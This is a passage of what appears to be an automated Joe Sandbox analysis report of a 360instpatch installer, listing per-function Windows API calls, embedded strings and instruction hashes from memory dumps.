                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$CallbackDispatchDispatcherPeekTranslateUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1533324876-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$ConnectConnectionsEnumStatus
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3492228599-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00B56871
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B568A0
                                                                                                                                                                                                              • URLDownloadToCacheFileW.URLMON(00000000,?,?,00000104,00000000,00000000), ref: 00B568B8
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,00000000,?), ref: 00B568C8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Download$CacheDelete_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1835763934-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CDE23D1: __wfsopen.LIBCMT ref: 6CDE23DE
                                                                                                                                                                                                              • __filelength.LIBCMT ref: 6CDA5B7E
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CDA5B8D
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: __FF_MSGBANNER.LIBCMT ref: 6CDDD4A1
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: __NMSG_WRITE.LIBCMT ref: 6CDDD4A8
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: RtlAllocateHeap.NTDLL(00000000,6CDDDF44,?,?,?,?,6CDDDF53,?), ref: 6CDDD4F5
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6CDA5BA1
                                                                                                                                                                                                              • __fread_nolock.LIBCMT ref: 6CDA5BAB
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: __lock.LIBCMT ref: 6CDDD566
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: ___sbh_find_block.LIBCMT ref: 6CDDD571
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: ___sbh_free_block.LIBCMT ref: 6CDDD580
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: HeapFree.KERNEL32(00000000,6CDDDF53,6CE25220,0000000C,6CDE7673,00000000,6CE25648,0000000C,6CDE76AD,6CDDDF53,?,?,6CDECAFF,00000004,6CE257F8,0000000C), ref: 6CDDD5B0
                                                                                                                                                                                                                • Part of subcall function 6CDDD548: GetLastError.KERNEL32(?,6CDECAFF,00000004,6CE257F8,0000000C,6CDE5FE1,6CDDDF53,?,00000000,00000000,00000000,?,6CDEAD80,00000001,00000214), ref: 6CDDD5C1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__filelength__fread_nolock__lock__wfsopen_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 82526466-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAAsyncSelect.WS2_32(?,00000000,?,00000000), ref: 6BF30382
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000002), ref: 6BF3038D
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 6BF303A3
                                                                                                                                                                                                              • WSACancelAsyncRequest.WS2_32(?), ref: 6BF303D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Async$CancelRequestSelectclosesocketshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3577682533-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF2FD34
                                                                                                                                                                                                              • htonl.WS2_32(00000000), ref: 6BF2FD46
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 6BF2FD52
                                                                                                                                                                                                              • sendto.WS2_32(00000784,00000000,6BF33743,6BFCC814,00000000,00000010), ref: 6BF2FD6C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsethtonlhtonssendto
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2645352339-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadIconW.USER32(000000CD), ref: 00B46699
                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,00000284), ref: 00B46703
                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000000,00000284), ref: 00B4670B
                                                                                                                                                                                                              • SetTimer.USER32(?,00002711,000007D0,00000000), ref: 00B4671B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Icon$NotifyShell_$LoadTimer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2558709860-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,00000000), ref: 6BEF79DA
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,?,?), ref: 6BEF7A01
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEF7A0B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 6BEF7A14
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseErrorLastOpenQueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 75635995-0
                                                                                                                                                                                                              • Opcode ID: 39af0ef5e6a05549e1f8af035daf1a0e1e6f03123da52a3ec464aa45570a2ecb
                                                                                                                                                                                                              • Instruction ID: 1b43c2bcd80f24857ad94aad2cc34ab7dc1ad8b8724696f49a03057ee43d3f3d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39af0ef5e6a05549e1f8af035daf1a0e1e6f03123da52a3ec464aa45570a2ecb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6201E476A00209AFDF41DF94D945BCE7BB8AB08305F1040A6FA05E6190E670DA289B61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 6BF272D2
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,00000000), ref: 6BF272F9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF27303
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 6BF2730C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseErrorLastOpenQueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 75635995-0
                                                                                                                                                                                                              • Opcode ID: c6189c4deb9c9f5d52119e9af330ffc07678e868dd0cb43d9ca6105283f3f5ee
                                                                                                                                                                                                              • Instruction ID: ff78841eb5aa2f4878494cbdaca7dcff62da7e4c15458a55d4e9472df45b0390
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6189c4deb9c9f5d52119e9af330ffc07678e868dd0cb43d9ca6105283f3f5ee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB01B676A0020DFFDF01DFA4D945BDE7BB8BB04715F1480A5FA05E61A0E770DA289B61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6BF3AB86
                                                                                                                                                                                                                • Part of subcall function 6BF42C40: __FindPESection.LIBCMT ref: 6BF42C9B
                                                                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 6BF3AB96
                                                                                                                                                                                                              • __freeptd.LIBCMT ref: 6BF3ABA0
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 6BF3ABA9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3182216644-0
                                                                                                                                                                                                              • Opcode ID: 678a5f8b4835cf13f5b1ba1b200f438a2a197707bdc8fe04be2602d02d0b4efe
                                                                                                                                                                                                              • Instruction ID: c7ff775320ca40eb421595c9e599ce9fd893bb3b83ccf785de834b02869b04b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 678a5f8b4835cf13f5b1ba1b200f438a2a197707bdc8fe04be2602d02d0b4efe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAD05E33014612ABEF992B72C959B2E3AD99F412B5F104065BC24C10B1EF3DC4C6C5A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00B9E99E
                                                                                                                                                                                                                • Part of subcall function 00BA30A0: __FindPESection.LIBCMT ref: 00BA30FB
                                                                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 00B9E9AE
                                                                                                                                                                                                              • __freeptd.LIBCMT ref: 00B9E9B8
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00B9E9C1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3182216644-0
                                                                                                                                                                                                              • Opcode ID: a2a8dfee5075b92a74fa2c26f63deb0e5917051b70acaae0612c9a1417a663d2
                                                                                                                                                                                                              • Instruction ID: ec2a6e41dda9ced8e59b78b00d3e44c435b80d3978105177ca2db40e5ebfdf91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2a8dfee5075b92a74fa2c26f63deb0e5917051b70acaae0612c9a1417a663d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0D01731004209AEEB6467B5ED2AB1D76D9DF82360F1500B1B814A60B1EFB4DCC1C926
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick_wcsncpy
                                                                                                                                                                                                              • String ID: [%d.] ADD URL: %s
                                                                                                                                                                                                              • API String ID: 2317306155-304945954
                                                                                                                                                                                                              • Opcode ID: eaa651c84c67cdaf0006de13ce248d88fd34fa91c82c0740b0f3904159a72f28
                                                                                                                                                                                                              • Instruction ID: 1aa8f49dc4f873a313e916a600e419237a6b5f5f1263e2cc46e435f63859b870
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaa651c84c67cdaf0006de13ce248d88fd34fa91c82c0740b0f3904159a72f28
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B516D729146059EEB24CFB8D9816EAB3F4FF08308F20482DD51AC7A41E739E556CFA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEF7B16
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000004,?,00000008,?,00000004,00000001,00000004,?,00000004,?,00000004), ref: 6BEF7BFA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 6BEF7B37
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocGlobal_memset
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
                                                                                                                                                                                                              • API String ID: 2074659453-3418006259
                                                                                                                                                                                                              • Opcode ID: 67119805835566fc6dcf883771bc15cdf7bc03d3e9c21dc646e8ec75a3f9b8f7
                                                                                                                                                                                                              • Instruction ID: 4a94f73b91be9610c043a01d809fbbffe4cb723922dd2b22237151c4ec0d357c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67119805835566fc6dcf883771bc15cdf7bc03d3e9c21dc646e8ec75a3f9b8f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA51D772D002189BCB11DFA0DC91EEE777CEF48704F714169D916AF195EB389A46CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF19995
                                                                                                                                                                                                                • Part of subcall function 6BEFB755: __EH_prolog3_GS.LIBCMT ref: 6BEFB75C
                                                                                                                                                                                                                • Part of subcall function 6BEFB755: lstrlenW.KERNEL32(?,0000000C,6BF19D3B,?,?), ref: 6BEFB780
                                                                                                                                                                                                                • Part of subcall function 6BEE84C9: char_traits.LIBCPMT ref: 6BEE84EE
                                                                                                                                                                                                                • Part of subcall function 6BF183A6: _memset.LIBCMT ref: 6BF183C4
                                                                                                                                                                                                                • Part of subcall function 6BF183A6: WideCharToMultiByte.KERNEL32(00000000,00000000,-00000004,000000FF,00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF), ref: 6BF183E5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.%3d] Init disconnected, ERR_HTTP_NOT_INITIALIZED, xrefs: 6BF19AF1
                                                                                                                                                                                                              • [%d.%3d] Init disconnected, ERR_HTTP_INVALID_URL, xrefs: 6BF19A36
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharH_prolog3H_prolog3_MultiWide_memsetchar_traitslstrlen
                                                                                                                                                                                                              • String ID: [%d.%3d] Init disconnected, ERR_HTTP_INVALID_URL$[%d.%3d] Init disconnected, ERR_HTTP_NOT_INITIALIZED
                                                                                                                                                                                                              • API String ID: 2571870572-270683280
                                                                                                                                                                                                              • Opcode ID: 3ec5acd8e2603162733aa5c538b5cd5fedecea08519de2d5c2c57f96358b89fa
                                                                                                                                                                                                              • Instruction ID: a1c055c4b429abeae979a44b8cecde18fd38557e0b5d63cddb16c0170c277540
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ec5acd8e2603162733aa5c538b5cd5fedecea08519de2d5c2c57f96358b89fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D651C772500709ABCB15DFB4CC42EEB7BA8EF45314F10491DF466832A0EB38A655C7A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 6BEE935C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE936A
                                                                                                                                                                                                                • Part of subcall function 6BEE9134: _wcslen.LIBCMT ref: 6BEE913B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] __open_file create file(%s) fail! error code is %d, xrefs: 6BEE9379
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorFileLast_wcslen
                                                                                                                                                                                                              • String ID: [%d.] __open_file create file(%s) fail! error code is %d
                                                                                                                                                                                                              • API String ID: 3865106863-2798064650
                                                                                                                                                                                                              • Opcode ID: abad2d3637c2931cd731457d012f6a984f85dda63890bb97a38d5c25d526daf5
                                                                                                                                                                                                              • Instruction ID: fe13429ed9cbbb0c906be444f35c0e8c766ae61571b5ee74f5b3cbb93451052d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abad2d3637c2931cd731457d012f6a984f85dda63890bb97a38d5c25d526daf5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A01F436440204FEEB506F74CC05F9637E8FB15726F118529FA56D51E0E37994968B70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF3325B: __EH_prolog3.LIBCMT ref: 6BF33262
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF35F87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountH_prolog3Tick
                                                                                                                                                                                                              • String ID: agt.p.360.cn$tr.p.360.cn
                                                                                                                                                                                                              • API String ID: 3287309161-3328026606
                                                                                                                                                                                                              • Opcode ID: 083410b4fe9b353fd8d127e5f01a3c78753e0b842cec25a7360ab911e7a69293
                                                                                                                                                                                                              • Instruction ID: 96ed89efbc04c7c952590d371571fb70435712c34cff9b64105926a57316288b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 083410b4fe9b353fd8d127e5f01a3c78753e0b842cec25a7360ab911e7a69293
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9F0B4B32103246AD950567A5C91B7B77DDEB96688F00002AFA119A2A0DF6EBC8183B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6CD3AD6C
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,Config\SafeIME.xml), ref: 6CD3AD82
                                                                                                                                                                                                                • Part of subcall function 6CD3AB57: __EH_prolog3.LIBCMT ref: 6CD3AB5E
                                                                                                                                                                                                                • Part of subcall function 6CD3AB57: CreateXMLDOMDocument.SITES(00000000,0000003C,6CD3AD96,?,?,Config\SafeIME.xml), ref: 6CD3AB88
                                                                                                                                                                                                                • Part of subcall function 6CD3AB57: VariantClear.OLEAUT32(?), ref: 6CD3ABD3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClearCombineCreateDocumentH_prolog3PathVariant_memset
                                                                                                                                                                                                              • String ID: Config\SafeIME.xml
                                                                                                                                                                                                              • API String ID: 3506927742-2267017868
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetValueW.SHLWAPI(80000001,Software\360Safe,EnableUE,?,00000000,?,&pid=,&ver=), ref: 00B5670E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                              • String ID: EnableUE$Software\360Safe
                                                                                                                                                                                                              • API String ID: 3702945584-3756293347
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegisterClipboardFormatW.USER32(SitesUI), ref: 6CD89C34
                                                                                                                                                                                                              • SmartDisableIME.SITES ref: 6CD89C3F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipboardDisableFormatRegisterSmart
                                                                                                                                                                                                              • String ID: SitesUI
                                                                                                                                                                                                              • API String ID: 3315930252-1048294868
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B128B3
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00B129B5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000008,00002000,?,00000000), ref: 00B129C5
                                                                                                                                                                                                                • Part of subcall function 00B15690: _malloc.LIBCMT ref: 00B1569C
                                                                                                                                                                                                                • Part of subcall function 00B15690: SetLastError.KERNEL32(00000008,00000000,00B1291E,00000000,00002000,?,00000000), ref: 00B156AE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_malloc$_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1834304950-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00000000,?,00000000,?,?,00B11043,?), ref: 00B14CF6
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000008,?,00000000,?,00000000,?,00000000,?,?,00B11043,?), ref: 00B14D13
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,00000000,?,?,00B11043,?), ref: 00B14D98
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Pointer$Read
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2010065189-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcsncpy$_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4291556967-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B78838
                                                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00B78845
                                                                                                                                                                                                                • Part of subcall function 00B9EDC6: __wsplitpath_helper.LIBCMT ref: 00B9EE08
                                                                                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B78874
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DiskFreeSpace__wsplitpath__wsplitpath_helper_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1401654830-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF26C75
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,000001FE,?,?,00000001), ref: 6BF26C96
                                                                                                                                                                                                              • _wcscpy.LIBCMT ref: 6BF26CA8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue_memset_wcscpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4123947661-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonl$htons
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3561267147-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00B12744,?), ref: 00B12784
